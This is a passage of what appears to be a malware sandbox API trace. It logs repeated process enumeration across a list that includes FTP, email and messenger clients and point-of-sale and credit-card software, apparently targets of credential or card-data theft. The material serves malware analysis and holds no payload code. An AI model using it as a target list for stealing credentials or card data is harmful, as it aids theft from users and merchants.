cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.950] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0243.951] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0243.953] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0243.955] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0243.957] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0243.958] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0243.960] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0243.962] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0244.021] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0244.023] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0244.024] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0244.026] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0244.028] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0244.029] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0244.031] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0244.032] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0244.033] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0244.035] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0244.036] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0244.037] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0244.039] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0244.040] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0244.047] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0244.051] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0244.053] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0244.054] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0244.056] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0244.061] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0244.063] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0244.065] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0244.067] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0244.068] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0244.070] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0244.072] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0244.220] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0244.222] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0244.224] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0244.226] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0244.227] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0244.229] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0244.233] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0244.235] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0244.237] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0244.238] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0244.240] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0244.242] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0244.243] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0244.248] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0244.249] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0244.251] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0244.253] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0244.255] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0244.257] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0244.259] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0244.277] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0244.279] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0244.280] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0244.282] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0244.283] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0244.285] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0244.286] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0244.288] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0244.289] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0244.291] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0244.295] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0244.297] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0244.298] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.300] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0244.301] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.303] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0244.304] CloseHandle (hObject=0x1b08) returned 1 [0244.304] Sleep (dwMilliseconds=0x64) [0244.473] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0244.490] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.491] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0244.493] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0244.494] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.496] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0244.499] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.501] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0244.502] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0244.504] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0244.505] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.506] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.508] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0244.509] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, 